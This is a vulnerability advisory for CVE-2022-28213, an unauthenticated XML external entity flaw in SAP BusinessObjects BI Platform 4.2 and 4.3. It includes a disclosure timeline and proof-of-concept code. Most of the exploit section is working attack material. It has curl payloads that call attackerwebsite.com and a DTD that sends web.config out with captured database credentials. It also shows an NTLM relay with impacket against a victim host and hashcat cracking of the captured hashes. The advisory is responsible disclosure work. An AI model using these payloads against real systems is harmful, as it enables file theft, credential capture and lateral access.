SAP BusinessObjects Intelligence 4.3 XXE漏洞(CVE-2022-28213)

### Description The SOAP Web Services in SAP BusinessObjects Intelligence (BI) Platform version 4.2 and 4.3 suffer from a remote unauthenticated XML External Entity (XXE) vulnerability due to insufficient XML validation, which can allow threat actors to read arbitrary files, trigger a Denial of Service (DoS), or forced authentication which can subsequently be used to capture credential hashes and execute NTLM relay attacks under the context of the underlying SAP service account. ### [](https://github.com/wshepherd0010/advisories/blob/master/CVE-2022-28213.md#vulnerability-type)Vulnerability Type Improper Restriction of XML External Entity Reference (CWE-611) ### [](https://github.com/wshepherd0010/advisories/blob/master/CVE-2022-28213.md#vendor-of-product)Vendor of Product SAP Software Solutions ### [](https://github.com/wshepherd0010/advisories/blob/master/CVE-2022-28213.md#affected-product-code-base)Affected Product Code Base SAP BusinessObjects Intelligence Platform version 4.2 and 4.3 ### [](https://github.com/wshepherd0010/advisories/blob/master/CVE-2022-28213.md#affected-component)Affected Component Component Version Endpoint Session Management in the BI Platform REST API 4.2-4.3 `biprws/logon/long` ### [](https://github.com/wshepherd0010/advisories/blob/master/CVE-2022-28213.md#attack-type)Attack Type Unauthenticated / Remote ### [](https://github.com/wshepherd0010/advisories/blob/master/CVE-2022-28213.md#impact-code-execution)Impact Code execution false ### [](https://github.com/wshepherd0010/advisories/blob/master/CVE-2022-28213.md#attack-vectors)Attack Vectors Remote unauthenticated threat actors can exploit this vulnerability through a specially crafted POST request that can be used to compromise the confidentiality of arbitrary files on the vulnerable system, impact availability by triggering a DoS condition, compromise the confidentiality of the underlying service accounts credential hashes through forced authentication, or obtain unauthorized access to other remote systems in the network under the context of the underlying SAP account through MITM/NTLM relay attacks. ### [](https://github.com/wshepherd0010/advisories/blob/master/CVE-2022-28213.md#reference)Reference [Product Website](https://www.sap.com/) [Product Download](https://www.sap.com/) ### [](https://github.com/wshepherd0010/advisories/blob/master/CVE-2022-28213.md#discoverer)Discoverer West Shepherd west\[at\]westlshepherd.com ### [](https://github.com/wshepherd0010/advisories/blob/master/CVE-2022-28213.md#advisory-id)Advisory ID CVE-2022-28213 ### [](https://github.com/wshepherd0010/advisories/blob/master/CVE-2022-28213.md#report-timeline)Report Timeline Date Action 1/27/2022 Discovered vulnerability, contacted vendor. 2/14/2022 Vendor released security patches (security note 3055044). 3/30/2022 Vendor published CVE-2022-28213. 4/19/2022 Confirmed with vendor that product is sufficiently patched. 4/21/2022 Ethical disclosure of details and proof-of-concept code. ### [](https://github.com/wshepherd0010/advisories/blob/master/CVE-2022-28213.md#poc)PoC ``` # Exploit Title: XXE - SAP BusinessObjects Intelligence 4.2 and 4.3 REST API # Google Dork: N/A # Date: 4/21/2022 # Exploit Author: West Shepherd # Vendor Homepage: https://www.sap.com/ # Software Link: https://www.sap.com/ # Version: 4.2 and 4.3 # Tested on: Windows Server 2019 x64 # CVE : CVE-2022-28213 curl -sk -X POST -H 'Content-Type: application/xml;charset=UTF-8' \\ --data '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root \[<!ENTITY % remote SYSTEM "\\\\attackerwebsite.com\\XXE\\example">%remote;%int;%trick;\]>' \\ https://example.com/biprws/logon/long ### [](https://github.com/wshepherd0010/advisories/blob/master/CVE-2022-28213.md#examples)Examples #### [](https://github.com/wshepherd0010/advisories/blob/master/CVE-2022-28213.md#reading-arbitrary-files)Reading Arbitrary Files 1. Triggering the XXE vulnerability: root@attackerwebsite.com:~/SAP/XXE# curl -sk -X POST -H 'Content-Type: application/xml;charset=UTF-8' \ --data '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "https://attackerwebsite.com/XXE.dtd">%remote;%int;%trick;]>' \ https://example.com/biprws/logon/long <?xml version="1.0" encoding="UTF-8" standalone="no"?> <error> <error_code>RWS 000079</error_code> <message>Enter a valid input (RWS 000079)</message> </error> 2. Reading arbitrary files: root@attackerwebsite.com:~/SAP/XXE# screen -S https root@attackerwebsite.com:~/SAP/XXE# cat /var/www/html/XXE.dtd <!ENTITY % payl SYSTEM "file:///c:/inetpub/wwwroot/web.config"> <!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://attackerwebsite.com/?p=%payl;'>"> root@attackerwebsite.com:~/SAP/XXE# service apache2 start [detached from 3986.https] root@attackerwebsite.com:~/SAP/XXE# nohup python3 -m http.server 80 2>/dev/null 1>> ~/loot/web.config & [1] 3884 root@attackerwebsite.com:~/SAP/XXE# cat ~/loot/web.config Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.8.8.2 - - [07/Jan/2022 09:22:35] "GET /XXE.dtd?payl=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22utf-8%22%3F%3E%0A%3Cconfiguration%3E%0A%20%20%3CconnectionStrings%3E%0A%20%20%20%20%3Cadd%20name%3D%22DBConnection%22%20connectionString%3D%22server%3Ddb-victim.example.com%3Bdatabase%3DExampleDB%3Buid%3Dvictim.com%5Csvcaccount%3Bpassword%3DBadP%40ssw0rd123%3B%22%20/%3E HTTP/1.1" 200 - ...[snip]... ``` #### [](https://github.com/wshepherd0010/advisories/blob/master/CVE-2022-28213.md#forced-authentication)Forced Authentication ``` 1. Triggering the XXE vulnerability: root@attackerwebsite.com:~/SAP/XXE# curl -sk -X POST -H 'Content-Type: application/xml;charset=UTF-8' \ --data '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "\\attackerwebsite.com\XXE\example">%remote;%int;%trick;]>' \ https://example.com/biprws/logon/long <?xml version="1.0" encoding="UTF-8" standalone="no"?> <error> <error_code>RWS 000079</error_code> <message>Enter a valid input (RWS 000079)</message> </error> 2. Performing NTLM relay against remote systems and capturing SAP hashes: root@attackerwebsite.com:~/SAP/XXE# screen -S relay root@attackerwebsite.com:~/SAP/XXE# nohup impacket-ntlmrelayx -ts -smb2support --no-http-server \ --no-wcf-server -ip 10.8.8.2 --serve-image ~/relay/forcedauth -i \ --output-file hashes --lootdir ~/loot -ntlmchallenge 88B2FC3A75AA60D4 \ -t smb://victim.example.com 2>&1>> relay.log & [1] 3196 root@attackerwebsite.com:~/SAP/XXE# nc -v localhost 11000 Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation Type help for list of commands # shares ADMIN$ C$ IPC$ wwwroot # use wwwroot [detached from 3206.relay] 3. Cracking SAP NetNTLMv2 hashes obtained: root@attackerwebsite.com:~/SAP/XXE# screen -S hashes root@attackerwebsite.com:~/SAP/XXE# ls ~/loot/hashes_ntlmv2 hashes_ntlmv2 root@attackerwebsite.com:~/SAP/XXE# hashcat -m 5600 -a 0 ~/loot/hashes_ntlmv2 rockyou.txt --force [detached from 3469.hashes] ``` ### [](https://github.com/wshepherd0010/advisories/blob/master/CVE-2022-28213.md#pgp)PGP -----BEGIN PGP PUBLIC KEY BLOCK----- Version: FlowCrypt Email Encryption 8.0.2 Comment: Seamlessly send and receive encrypted email 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 X4sYJ+s= =a56m -----END PGP PUBLIC KEY BLOCK-----